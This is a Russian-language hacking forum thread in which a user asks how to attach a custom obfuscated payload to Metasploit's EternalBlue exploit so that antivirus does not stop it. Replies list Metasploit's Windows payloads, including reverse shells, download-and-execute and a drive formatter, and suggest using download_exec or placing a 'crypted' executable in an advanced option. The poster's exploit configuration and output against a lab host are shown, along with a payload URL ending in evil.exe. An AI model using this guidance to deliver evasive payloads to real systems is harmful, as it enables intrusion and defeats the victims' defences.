Как прикрутить собственный PAYLOAD в msf

Discussion in 'Песочница' started by UrfinJuice, 23 Nov 2017.

  1. UrfinJuice

    UrfinJuice New Member

    Joined:
    23 Nov 2017
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Добрый день, форумчане!
    Помогите разобраться...

    Ситуация: Беру Metasploit выбираю эксплоит, к примеру, eternalblue. В качестве PAYLOAD можно выбрать, скажем, meterpreter. Основная проблема в том, что эта нагрузка не дает сессию и я подозреваю, что ее блокирует АВ. (В тестовых условиях, без АВ сессия прилетает).

    В интернетах куча статей про Shellter, Veil(кстати новый вышел), msfvenom и т.п. Но все, что я читал, просто генерируют, кодируют нагрузку, а дальше, как везде пишут, "доставляется на машину жертвы" и запускается.

    Теперь вопрос: Каким образом можно взять произвольную нагрузку(A)(например на powershell из Empire), прогнать ее через тот же Veil и получившийся файл(B) уже прикрутить к эксплоиту, тому же eternalblue.
    Подскажите чем больше способов, тем лучше.

    P. S. Я пробовал выбрать payload windows/exec, чтобы просто передать команду(А) для CMD. Но при любом значении CMD у меня ошибка - значение параметра не валидно. При этом если эту A запустить вручную на жертве, сессия приходит.

    P.P.S. Большинство стандартных нагрузок в msf уже содержат в себе инструкции для создания сессии, будь то реверс или бинд. Мне же нужно только доставить и запустить свой обфусцированный, кодированный и т.п. код.
     
  2. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Поехалиииии

    show payloads
    Code:
       windows/adduser                                                      normal  Windows Execute net user /ADD
       windows/dllinject/bind_hidden_ipknock_tcp                            normal  Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
       windows/dllinject/bind_hidden_tcp                                    normal  Reflective DLL Injection, Hidden Bind TCP Stager
       windows/dllinject/bind_ipv6_tcp                                      normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
       windows/dllinject/bind_ipv6_tcp_uuid                                 normal  Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/dllinject/bind_nonx_tcp                                      normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
       windows/dllinject/bind_tcp                                           normal  Reflective DLL Injection, Bind TCP Stager (Windows x86)
       windows/dllinject/bind_tcp_rc4                                       normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/dllinject/bind_tcp_uuid                                      normal  Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
       windows/dllinject/find_tag                                           normal  Reflective DLL Injection, Find Tag Ordinal Stager
       windows/dllinject/reverse_hop_http                                   normal  Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
       windows/dllinject/reverse_http                                       normal  Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
       windows/dllinject/reverse_http_proxy_pstore                          normal  Reflective DLL Injection, Reverse HTTP Stager Proxy
       windows/dllinject/reverse_ipv6_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
       windows/dllinject/reverse_nonx_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
       windows/dllinject/reverse_ord_tcp                                    normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
       windows/dllinject/reverse_tcp                                        normal  Reflective DLL Injection, Reverse TCP Stager
       windows/dllinject/reverse_tcp_allports                               normal  Reflective DLL Injection, Reverse All-Port TCP Stager
       windows/dllinject/reverse_tcp_dns                                    normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
       windows/dllinject/reverse_tcp_rc4                                    normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/dllinject/reverse_tcp_rc4_dns                                normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/dllinject/reverse_tcp_uuid                                   normal  Reflective DLL Injection, Reverse TCP Stager with UUID Support
       windows/dllinject/reverse_winhttp                                    normal  Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
       windows/dns_txt_query_exec                                           normal  DNS TXT Record Payload Download and Execution
       windows/download_exec                                                normal  Windows Executable Download (http,https,ftp) and Execute
       windows/exec                                                         normal  Windows Execute Command
       windows/format_all_drives                                            manual  Windows Drive Formatter
       windows/loadlibrary                                                  normal  Windows LoadLibrary Path
       windows/messagebox                                                   normal  Windows MessageBox
       windows/meterpreter/bind_hidden_ipknock_tcp                          normal  Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
       windows/meterpreter/bind_hidden_tcp                                  normal  Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
       windows/meterpreter/bind_ipv6_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
       windows/meterpreter/bind_ipv6_tcp_uuid                               normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/meterpreter/bind_nonx_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
       windows/meterpreter/bind_tcp                                         normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
       windows/meterpreter/bind_tcp_rc4                                     normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/meterpreter/bind_tcp_uuid                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
       windows/meterpreter/find_tag                                         normal  Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
       windows/meterpreter/reverse_hop_http                                 normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
       windows/meterpreter/reverse_http                                     normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
       windows/meterpreter/reverse_http_proxy_pstore                        normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
       windows/meterpreter/reverse_https                                    normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
       windows/meterpreter/reverse_https_proxy                              normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
       windows/meterpreter/reverse_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
       windows/meterpreter/reverse_named_pipe                               normal  Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
       windows/meterpreter/reverse_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
       windows/meterpreter/reverse_ord_tcp                                  normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
       windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
       windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
       windows/meterpreter/reverse_tcp_dns                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
       windows/meterpreter/reverse_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/meterpreter/reverse_tcp_rc4_dns                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/meterpreter/reverse_tcp_uuid                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
       windows/meterpreter/reverse_winhttp                                  normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
       windows/meterpreter/reverse_winhttps                                 normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
       windows/meterpreter_bind_tcp                                         normal  Windows Meterpreter Shell, Bind TCP Inline
       windows/meterpreter_reverse_http                                     normal  Windows Meterpreter Shell, Reverse HTTP Inline
       windows/meterpreter_reverse_https                                    normal  Windows Meterpreter Shell, Reverse HTTPS Inline
       windows/meterpreter_reverse_ipv6_tcp                                 normal  Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
       windows/meterpreter_reverse_tcp                                      normal  Windows Meterpreter Shell, Reverse TCP Inline
       windows/metsvc_bind_tcp                                              normal  Windows Meterpreter Service, Bind TCP
       windows/metsvc_reverse_tcp                                           normal  Windows Meterpreter Service, Reverse TCP Inline
       windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  Windows Inject DLL, Hidden Bind Ipknock TCP Stager
       windows/patchupdllinject/bind_hidden_tcp                             normal  Windows Inject DLL, Hidden Bind TCP Stager
       windows/patchupdllinject/bind_ipv6_tcp                               normal  Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
       windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/patchupdllinject/bind_nonx_tcp                               normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
       windows/patchupdllinject/bind_tcp                                    normal  Windows Inject DLL, Bind TCP Stager (Windows x86)
       windows/patchupdllinject/bind_tcp_rc4                                normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/patchupdllinject/bind_tcp_uuid                               normal  Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
       windows/patchupdllinject/find_tag                                    normal  Windows Inject DLL, Find Tag Ordinal Stager
       windows/patchupdllinject/reverse_ipv6_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
       windows/patchupdllinject/reverse_nonx_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
       windows/patchupdllinject/reverse_ord_tcp                             normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
       windows/patchupdllinject/reverse_tcp                                 normal  Windows Inject DLL, Reverse TCP Stager
       windows/patchupdllinject/reverse_tcp_allports                        normal  Windows Inject DLL, Reverse All-Port TCP Stager
       windows/patchupdllinject/reverse_tcp_dns                             normal  Windows Inject DLL, Reverse TCP Stager (DNS)
       windows/patchupdllinject/reverse_tcp_rc4                             normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/patchupdllinject/reverse_tcp_rc4_dns                         normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/patchupdllinject/reverse_tcp_uuid                            normal  Windows Inject DLL, Reverse TCP Stager with UUID Support
       windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
       windows/patchupmeterpreter/bind_hidden_tcp                           normal  Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
       windows/patchupmeterpreter/bind_ipv6_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
       windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/patchupmeterpreter/bind_nonx_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
       windows/patchupmeterpreter/bind_tcp                                  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
       windows/patchupmeterpreter/bind_tcp_rc4                              normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/patchupmeterpreter/bind_tcp_uuid                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
       windows/patchupmeterpreter/find_tag                                  normal  Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager
       windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
       windows/patchupmeterpreter/reverse_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
       windows/patchupmeterpreter/reverse_ord_tcp                           normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
       windows/patchupmeterpreter/reverse_tcp                               normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
       windows/patchupmeterpreter/reverse_tcp_allports                      normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
       windows/patchupmeterpreter/reverse_tcp_dns                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
       windows/patchupmeterpreter/reverse_tcp_rc4                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/patchupmeterpreter/reverse_tcp_rc4_dns                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/patchupmeterpreter/reverse_tcp_uuid                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
       windows/powershell_bind_tcp                                          normal  Windows Interactive Powershell Session, Bind TCP
       windows/powershell_reverse_tcp                                       normal  Windows Interactive Powershell Session, Reverse TCP
       windows/shell/bind_hidden_ipknock_tcp                                normal  Windows Command Shell, Hidden Bind Ipknock TCP Stager
       windows/shell/bind_hidden_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Stager
       windows/shell/bind_ipv6_tcp                                          normal  Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
       windows/shell/bind_ipv6_tcp_uuid                                     normal  Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/shell/bind_nonx_tcp                                          normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
       windows/shell/bind_tcp                                               normal  Windows Command Shell, Bind TCP Stager (Windows x86)
       windows/shell/bind_tcp_rc4                                           normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/shell/bind_tcp_uuid                                          normal  Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
       windows/shell/find_tag                                               normal  Windows Command Shell, Find Tag Ordinal Stager
       windows/shell/reverse_ipv6_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (IPv6)
       windows/shell/reverse_nonx_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
       windows/shell/reverse_ord_tcp                                        normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
       windows/shell/reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Stager
       windows/shell/reverse_tcp_allports                                   normal  Windows Command Shell, Reverse All-Port TCP Stager
       windows/shell/reverse_tcp_dns                                        normal  Windows Command Shell, Reverse TCP Stager (DNS)
       windows/shell/reverse_tcp_rc4                                        normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/shell/reverse_tcp_rc4_dns                                    normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/shell/reverse_tcp_uuid                                       normal  Windows Command Shell, Reverse TCP Stager with UUID Support
       windows/shell_bind_tcp                                               normal  Windows Command Shell, Bind TCP Inline
       windows/shell_bind_tcp_xpfw                                          normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
       windows/shell_hidden_bind_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Inline
       windows/shell_reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Inline
       windows/speak_pwned                                                  normal  Windows Speech API - Say "You Got Pwned!"
       windows/upexec/bind_hidden_ipknock_tcp                               normal  Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
       windows/upexec/bind_hidden_tcp                                       normal  Windows Upload/Execute, Hidden Bind TCP Stager
       windows/upexec/bind_ipv6_tcp                                         normal  Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
       windows/upexec/bind_ipv6_tcp_uuid                                    normal  Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/upexec/bind_nonx_tcp                                         normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
       windows/upexec/bind_tcp                                              normal  Windows Upload/Execute, Bind TCP Stager (Windows x86)
       windows/upexec/bind_tcp_rc4                                          normal  Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/upexec/bind_tcp_uuid                                         normal  Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
       windows/upexec/find_tag                                              normal  Windows Upload/Execute, Find Tag Ordinal Stager
       windows/upexec/reverse_ipv6_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
       windows/upexec/reverse_nonx_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
       windows/upexec/reverse_ord_tcp                                       normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
       windows/upexec/reverse_tcp                                           normal  Windows Upload/Execute, Reverse TCP Stager
       windows/upexec/reverse_tcp_allports                                  normal  Windows Upload/Execute, Reverse All-Port TCP Stager
       windows/upexec/reverse_tcp_dns                                       normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
       windows/upexec/reverse_tcp_rc4                                       normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/upexec/reverse_tcp_rc4_dns                                   normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/upexec/reverse_tcp_uuid                                      normal  Windows Upload/Execute, Reverse TCP Stager with UUID Support
       windows/vncinject/bind_hidden_ipknock_tcp                            normal  VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
       windows/vncinject/bind_hidden_tcp                                    normal  VNC Server (Reflective Injection), Hidden Bind TCP Stager
       windows/vncinject/bind_ipv6_tcp                                      normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
       windows/vncinject/bind_ipv6_tcp_uuid                                 normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/vncinject/bind_nonx_tcp                                      normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
       windows/vncinject/bind_tcp                                           normal  VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
       windows/vncinject/bind_tcp_rc4                                       normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/vncinject/bind_tcp_uuid                                      normal  VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
       windows/vncinject/find_tag                                           normal  VNC Server (Reflective Injection), Find Tag Ordinal Stager
       windows/vncinject/reverse_hop_http                                   normal  VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
       windows/vncinject/reverse_http                                       normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
       windows/vncinject/reverse_http_proxy_pstore                          normal  VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
       windows/vncinject/reverse_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
       windows/vncinject/reverse_nonx_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
       windows/vncinject/reverse_ord_tcp                                    normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
       windows/vncinject/reverse_tcp                                        normal  VNC Server (Reflective Injection), Reverse TCP Stager
       windows/vncinject/reverse_tcp_allports                               normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
       windows/vncinject/reverse_tcp_dns                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
       windows/vncinject/reverse_tcp_rc4                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/vncinject/reverse_tcp_rc4_dns                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/vncinject/reverse_tcp_uuid                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
       windows/vncinject/reverse_winhttp                                    normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
       windows/x64/exec                                                     normal  Windows x64 Execute Command
       windows/x64/loadlibrary                                              normal  Windows x64 LoadLibrary Path
       windows/x64/meterpreter/bind_ipv6_tcp                                normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
       windows/x64/meterpreter/bind_ipv6_tcp_uuid                           normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
       windows/x64/meterpreter/bind_tcp                                     normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
       windows/x64/meterpreter/bind_tcp_uuid                                normal  Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
       windows/x64/meterpreter/reverse_http                                 normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
       windows/x64/meterpreter/reverse_https                                normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
       windows/x64/meterpreter/reverse_named_pipe                           normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
       windows/x64/meterpreter/reverse_tcp                                  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
       windows/x64/meterpreter/reverse_tcp_uuid                             normal  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
       windows/x64/meterpreter/reverse_winhttp                              normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
       windows/x64/meterpreter/reverse_winhttps                             normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
       windows/x64/meterpreter_bind_tcp                                     normal  Windows Meterpreter Shell, Bind TCP Inline (x64)
       windows/x64/meterpreter_reverse_http                                 normal  Windows Meterpreter Shell, Reverse HTTP Inline (x64)
       windows/x64/meterpreter_reverse_https                                normal  Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
       windows/x64/meterpreter_reverse_ipv6_tcp                             normal  Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
       windows/x64/meterpreter_reverse_tcp                                  normal  Windows Meterpreter Shell, Reverse TCP Inline x64
       windows/x64/powershell_bind_tcp                                      normal  Windows Interactive Powershell Session, Bind TCP
       windows/x64/powershell_reverse_tcp                                   normal  Windows Interactive Powershell Session, Reverse TCP
       windows/x64/shell/bind_ipv6_tcp                                      normal  Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
       windows/x64/shell/bind_ipv6_tcp_uuid                                 normal  Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
       windows/x64/shell/bind_tcp                                           normal  Windows x64 Command Shell, Windows x64 Bind TCP Stager
       windows/x64/shell/bind_tcp_uuid                                      normal  Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
       windows/x64/shell/reverse_tcp                                        normal  Windows x64 Command Shell, Windows x64 Reverse TCP Stager
       windows/x64/shell/reverse_tcp_uuid                                   normal  Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
       windows/x64/shell_bind_tcp                                           normal  Windows x64 Command Shell, Bind TCP Inline
       windows/x64/shell_reverse_tcp                                        normal  Windows x64 Command Shell, Reverse TCP Inline
       windows/x64/vncinject/bind_ipv6_tcp                                  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
       windows/x64/vncinject/bind_ipv6_tcp_uuid                             normal  Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
       windows/x64/vncinject/bind_tcp                                       normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
       windows/x64/vncinject/bind_tcp_uuid                                  normal  Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
       windows/x64/vncinject/reverse_http                                   normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
       windows/x64/vncinject/reverse_https                                  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
       windows/x64/vncinject/reverse_tcp                                    normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
       windows/x64/vncinject/reverse_tcp_uuid                               normal  Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
       windows/x64/vncinject/reverse_winhttp                                normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
       windows/x64/vncinject/reverse_winhttps                               normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

    А теперь отвечаю на вопросы. Начнем с reverse_tcp. Меняешь на dns, https и так далее.
    Если сессия отваливается то старый добрый windows/shell/reverse_tcp_dns

    А может проще vnc прокинуть? windows/vncinject/reverse_http
    А разрядность соблюдена? windows/x64/exec

    Ну а всё же если хочется свой payload то payload/windows/download_exec
    Или же.... Пишем свой

    Пример скилета тут https://github.com/rapid7/metasploi.../modules/payloads/stagers/windows/bind_tcp.rb
     
    _________________________
    TOX1C and Veil like this.
  3. vitrend

    vitrend New Member

    Joined:
    29 Sep 2017
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Имеются ли знающие в данном деле (експлойты, пейлоады) люди, которые смогут довести до ума данный софт с масканом, автозагрузкой експлойтами и т.д?
     
  4. UrfinJuice

    UrfinJuice New Member

    Joined:
    23 Nov 2017
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    SoolFaa, спасибо за ответ.

    Прокомментирую по порядку...

    1. Нагрузки пробовал менять, сессия не прилетает, хотя, например, запросы на 80 порт (http) целевой хост разрешает.
    2. windows/shell/reverse_tcp_dns - попробую.

    3. Просто windows/vncinject/reverse_http не срабатывает. А вот если сначала получить сессию метерпретера , а потом через payload/inject запихнуть vncinject, то все работает. Но такой вариант не актуален.
    4. Целевой хост с архитектурой x86, за этим слежу.
    5. Была большая надежда на payload/windows/download_exec. Это как раз то что нужно, но сессия не приходит. Хотя если по url зайти вручную с целевого хоста, все срабатывает отлично.


    Можно тогда пока сузить область вопроса....

    1. Почему не прилетает сессия с payload/windows/download_exec?
    2. Почему в windows/exec c параметром CND=calc.exe вылетает ошибка "could not validate CMD"?
     
  5. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    ЧТобы ответить на эти два вопроса нужен целевой таргет.
     
    _________________________
  6. UrfinJuice

    UrfinJuice New Member

    Joined:
    23 Nov 2017
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Таргет - Windows 7 Sp1 x86 сборка 7601.
    Атакующий хост - KaliLinux 2017.3
    Эксплоит - eternalblue_doublepulsar
     
  7. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    1) Дело не в нагрузке, а в способе запуска. Анивирь ловит любые способы инжекта в процесс/детектит рефлектив.
    2) CND=calc.exe
    Надо CMD.
     
    _________________________
  8. UrfinJuice

    UrfinJuice New Member

    Joined:
    23 Nov 2017
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    1) АВ выключен. Кроме того Этот же exe-шник, но руками зарущенный на таргете дает сессию на отлично. В данном случае АВ ни при чем.
    2) с CND - это опечатка, так то я правильно ввожу. Вот такая ошибка на выходе - The following options failed to validate: CMD
     
  9. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    1) Есть кириллица в пути?
    2) Возможно ругается из-за кавычек
    Ждём скрин с заполнением параметров (SET CMD calc.exe....)
     
    _________________________
  10. UrfinJuice

    UrfinJuice New Member

    Joined:
    23 Nov 2017
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    1. http://192.168.137.128/evil.exe Повторюсь, вручную на таргете ссылка работает.
    2.
    Code:
    Module options (exploit/windows/smb/eternalblue_doublepulsar):
    
       Name                Current Setting                                  Required  Description
       ----                ---------------                                  --------  -----------
       DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
       ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
       PROCESSINJECT       spoolsv.exe                                      yes       Name of process to inject into (Change to lsass.exe for x64)
       RHOST               192.168.137.130                                  yes       The target address
       RPORT               445                                              yes       The SMB service port (TCP)
       TARGETARCHITECTURE  x86                                              yes       Target Architecture (Accepted: x86, x64)
       WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path
    
    
    Payload options (windows/exec):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       CMD       calc.exe         yes       The command string to execute
       EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    Результат:

    Code:
    [*] 192.168.137.130:445 - Generating Eternalblue XML data
    [*] 192.168.137.130:445 - Generating Doublepulsar XML data
    [*] 192.168.137.130:445 - Generating payload DLL for Doublepulsar
    [-] 192.168.137.130:445 - Exploit failed: Msf::OptionValidateError The following options failed to validate: CMD.
    [*] Exploit completed, but no session was created.
    
     
  11. UrfinJuice

    UrfinJuice New Member

    Joined:
    23 Nov 2017
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Уважаемые модеры, может лучше переименовать топик, так как суть вопроса немного изменилась? Теперь проблема в том, что не работают конкретные payload-ы...
     
  12. h3xp1017

    h3xp1017 Member

    Joined:
    28 Oct 2015
    Messages:
    84
    Likes Received:
    25
    Reputations:
    1
    show advanced

    там будет чета типа EXE::pATH и туда свой криптованный пихай